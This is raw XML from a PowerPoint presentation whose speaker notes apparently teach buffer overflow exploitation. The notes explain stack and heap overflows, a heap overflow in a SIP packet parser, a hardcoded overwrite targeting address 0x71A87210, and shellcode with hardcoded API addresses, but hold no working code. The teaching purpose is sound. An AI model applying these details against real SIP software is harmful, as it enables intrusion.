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ommentAuthors.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.commentAuthor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20.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1.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/comments/comment19.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.comments+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media/image35.jpeg" ContentType="image/jpeg"/>
  <Override PartName="/ppt/media/image34.png" ContentType="image/png"/>
  <Override PartName="/ppt/media/image32.png" ContentType="image/png"/>
  <Override PartName="/ppt/media/image30.png" ContentType="image/png"/>
  <Override PartName="/ppt/media/image29.png" ContentType="image/png"/>
  <Override PartName="/ppt/media/image25.png" ContentType="image/png"/>
  <Override PartName="/ppt/media/image24.png" ContentType="image/png"/>
  <Override PartName="/ppt/media/image23.png" ContentType="image/png"/>
  <Override PartName="/ppt/media/image22.png" ContentType="image/png"/>
  <Override PartName="/ppt/media/image8.wmf" ContentType="image/x-wmf"/>
  <Override PartName="/ppt/media/image21.png" ContentType="image/png"/>
  <Override PartName="/ppt/media/image19.png" ContentType="image/png"/>
  <Override PartName="/ppt/media/image18.wmf" ContentType="image/x-wmf"/>
  <Override PartName="/ppt/media/image36.png" ContentType="image/png"/>
  <Override PartName="/ppt/media/image16.wmf" ContentType="image/x-wmf"/>
  <Override PartName="/ppt/media/image14.png" ContentType="image/png"/>
  <Override PartName="/ppt/media/image26.png" ContentType="image/png"/>
  <Override PartName="/ppt/media/image31.png" ContentType="image/png"/>
  <Override PartName="/ppt/media/image11.wmf" ContentType="image/x-wmf"/>
  <Override PartName="/ppt/media/image1.wmf" ContentType="image/x-wmf"/>
  <Override PartName="/ppt/media/image17.jpeg" ContentType="image/jpeg"/>
  <Override PartName="/ppt/media/image28.png" ContentType="image/png"/>
  <Override PartName="/ppt/media/image5.png" ContentType="image/png"/>
  <Override PartName="/ppt/media/image33.png" ContentType="image/png"/>
  <Override PartName="/ppt/media/image13.wmf" ContentType="image/x-wmf"/>
  <Override PartName="/ppt/media/image10.png" ContentType="image/png"/>
  <Override PartName="/ppt/media/image15.png" ContentType="image/png"/>
  <Override PartName="/ppt/media/image12.jpeg" ContentType="image/jpeg"/>
  <Override PartName="/ppt/media/image9.png" ContentType="image/png"/>
  <Override PartName="/ppt/media/image20.png" ContentType="image/png"/>
  <Override PartName="/ppt/media/image7.jpeg" ContentType="image/jpeg"/>
  <Override PartName="/ppt/media/image6.wmf" ContentType="image/x-wmf"/>
  <Override PartName="/ppt/media/image27.png" ContentType="image/png"/>
  <Override PartName="/ppt/media/image4.png" ContentType="image/png"/>
  <Override PartName="/ppt/media/image3.wmf" ContentType="image/x-wmf"/>
  <Override PartName="/ppt/media/image2.jpeg" ContentType="image/jpeg"/>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presentation>
</file>

<file path=ppt/commentAuthors.xml><?xml version="1.0" encoding="utf-8"?>
<p:cmAuthorLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:cmAuthor id="0" name="DeZutter, Joachim" initials="DJ"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commentAuthors" Target="commentAuthors.xml"/>
</Relationships>
</file>

<file path=ppt/comments/comment19.xml><?xml version="1.0" encoding="utf-8"?>
<p:cmLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:cm authorId="0" dt="2018-10-24T11:45:37.833000000" idx="1">
    <p:pos x="0" y="0"/>
    <p:text/>
  </p:cm>
</p:cmLst>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5"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476" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="hdr"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="3280320" cy="534240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" rIns="0" tIns="0" bIns="0"/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>&lt;header&gt;</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="477" name="PlaceHolder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4279320" y="0"/>
            <a:ext cx="3280320" cy="534240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" rIns="0" tIns="0" bIns="0"/>
          <a:p>
            <a:pPr algn="r"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>&lt;date/time&gt;</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="478" name="PlaceHolder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="10157400"/>
            <a:ext cx="3280320" cy="534240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" rIns="0" tIns="0" bIns="0" anchor="b"/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>&lt;footer&gt;</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="479" name="PlaceHolder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4279320" y="10157400"/>
            <a:ext cx="3280320" cy="534240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" rIns="0" tIns="0" bIns="0" anchor="b"/>
          <a:p>
            <a:pPr algn="r"/>
            <a:fld id="{2D56BE91-1B37-4ECE-A524-8B2C1CF8C190}"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7" name="PlaceHolder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="4400640"/>
            <a:ext cx="5486040" cy="3600000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="558" name="TextShape 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3884760" y="8685360"/>
            <a:ext cx="2971440" cy="458280"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:p>
            <a:pPr algn="r">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:fld id="{F07329DD-D971-4071-A196-5DAF9D7E665E}" type="slidenum">
              <a:rPr lang="en-US" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solid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3" name="PlaceHolder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="4400640"/>
            <a:ext cx="5486040" cy="3600000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Chunk1 on the image is a used chunk, the others are freed memory chunks.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Heap grows up towards higher addresses.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>This image is an oversimplification: in practice the heap structures are more complicated for example split in a front-end and back-end heap allocator with associated data structures that can vary.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="574" name="TextShape 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3884760" y="8685360"/>
            <a:ext cx="2971440" cy="458280"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:p>
            <a:pPr algn="r">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:fld id="{569D8C25-2544-4364-B844-0F9D2C7EB35C}" type="slidenum">
              <a:rPr lang="en-US" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solid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5" name="PlaceHolder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="4400640"/>
            <a:ext cx="5486040" cy="3600000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>contentLength and mBuffer are under the attacker’s control, and because the size of the sent mBuffer can be larger than claimed in the contentLength field of the SIP header, an attacker can carefully craft the SIP packets to trigger a heap overflow</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="576" name="TextShape 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3884760" y="8685360"/>
            <a:ext cx="2971440" cy="458280"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:p>
            <a:pPr algn="r">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:fld id="{06D7ABC7-86F3-4FE5-BC62-245015A3F2BF}" type="slidenum">
              <a:rPr lang="en-US" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>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7" name="PlaceHolder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="4400640"/>
            <a:ext cx="5486040" cy="3600000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>The address of a slightly smashed REGISTER packet buffer should be written to the write_address.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>The 220 is a hardcoded value which causes overwriting of various memory chunks after the overflowing chunk. Even though this appeared to work reliably to write the address of the register packet buffer to 0x71A87210 while testing the exploit, heap normalization techniques could be used to make the exploit even more reliable.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="578" name="TextShape 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3884760" y="8685360"/>
            <a:ext cx="2971440" cy="458280"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:p>
            <a:pPr algn="r">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:fld id="{AB33790A-6229-424E-9A69-6DC26C09842F}" type="slidenum">
              <a:rPr lang="en-US" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="000000"/>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9" name="PlaceHolder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="4400640"/>
            <a:ext cx="5486040" cy="3600000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="580" name="TextShape 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3884760" y="8685360"/>
            <a:ext cx="2971440" cy="458280"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:p>
            <a:pPr algn="r">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:fld id="{2D666149-0D16-4A61-BD8D-79772F5E7DE0}" type="slidenum">
              <a:rPr lang="en-US" sz="1200">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9" name="PlaceHolder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="4400640"/>
            <a:ext cx="5486040" cy="3600000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="560" name="TextShape 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3884760" y="8685360"/>
            <a:ext cx="2971440" cy="458280"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:p>
            <a:pPr algn="r">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:fld id="{EE640D26-C0D7-4147-A078-0447A98B5E38}" type="slidenum">
              <a:rPr lang="en-US" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>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1" name="PlaceHolder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="4400640"/>
            <a:ext cx="5486040" cy="3600000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="582" name="TextShape 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3884760" y="8685360"/>
            <a:ext cx="2971440" cy="458280"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:p>
            <a:pPr algn="r">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:fld id="{00C61DDE-AD8D-4F14-94EB-E96D91300A73}" type="slidenum">
              <a:rPr lang="en-US"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1" name="PlaceHolder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="4400640"/>
            <a:ext cx="5486040" cy="3600000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="562" name="TextShape 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3884760" y="8685360"/>
            <a:ext cx="2971440" cy="458280"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:p>
            <a:pPr algn="r">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:fld id="{901D5A14-1685-4B2E-942C-C24706D30F77}" type="slidenum">
              <a:rPr lang="en-US"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3" name="PlaceHolder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="4400640"/>
            <a:ext cx="5486040" cy="3600000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Before discussing heap overflows we explain stack overflows because these are simpler to understand.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>This example was taken from Wikipedia (https://en.wikipedia.org/wiki/Stack_buffer_overflow), more information about stack based buffer overflow exploits can be found there.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="564" name="TextShape 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3884760" y="8685360"/>
            <a:ext cx="2971440" cy="458280"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:p>
            <a:pPr algn="r">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:fld id="{6C52C61B-F125-4163-A4EC-A744E32D4743}" type="slidenum">
              <a:rPr lang="en-US"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5" name="PlaceHolder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="4400640"/>
            <a:ext cx="5486040" cy="3600000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Images show what happens on the stack when a stack buffer overflow occurs: the buffer c is too small, so the return address is overwritten.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>In practice the return address will likely be set to point to code that jumps/calls a CPU register that happens to be pointing somewhere inside the buffer at the time the function returns.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="566" name="TextShape 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3884760" y="8685360"/>
            <a:ext cx="2971440" cy="458280"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:p>
            <a:pPr algn="r">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:fld id="{4C6B4965-9688-4E53-8348-27ACB7F63F03}" type="slidenum">
              <a:rPr lang="en-US" sz="1200">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7" name="PlaceHolder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="4400640"/>
            <a:ext cx="5486040" cy="3600000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Stack overflows were very widespread and easy to exploit in ~2001.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>The buffer had to be carefully crafted so the return address would be set to the desired value.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="568" name="TextShape 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3884760" y="8685360"/>
            <a:ext cx="2971440" cy="458280"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:p>
            <a:pPr algn="r">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:fld id="{F71B5E1B-C426-414E-A78F-45118AF59BFD}" type="slidenum">
              <a:rPr lang="en-US" sz="1200">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9" name="PlaceHolder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="4400640"/>
            <a:ext cx="5486040" cy="3600000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="570" name="TextShape 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3884760" y="8685360"/>
            <a:ext cx="2971440" cy="458280"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:p>
            <a:pPr algn="r">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:fld id="{9F1B3685-2391-4F8F-9B21-7183C29E0887}" type="slidenum">
              <a:rPr lang="en-US" sz="1200">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1" name="PlaceHolder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="4400640"/>
            <a:ext cx="5486040" cy="3600000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Shellcode has to be position independent code.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>This shellcode has LoadLibraryA and GetProcAddress addresses hardcoded, but it’s also possible to find these using the PEB (https://www.tophertimzen.com/blog/shellcodeTechniquesCPP/)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="572" name="TextShape 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3884760" y="8685360"/>
            <a:ext cx="2971440" cy="458280"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:p>
            <a:pPr algn="r">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:fld id="{B811EE12-D965-44B4-A2E5-ADBDDB666F9A}"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8" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609480" y="1604520"/>
            <a:ext cx="10972440" cy="3976920"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" rIns="0" tIns="0" bIns="0"/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="39" name="PlaceHolder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609480" y="1604520"/>
            <a:ext cx="10972440" cy="3976920"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" rIns="0" tIns="0" bIns="0"/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="40" name="" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3603240" y="1604160"/>
            <a:ext cx="4984200" cy="3976920"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="41" name="" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>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45"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47" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
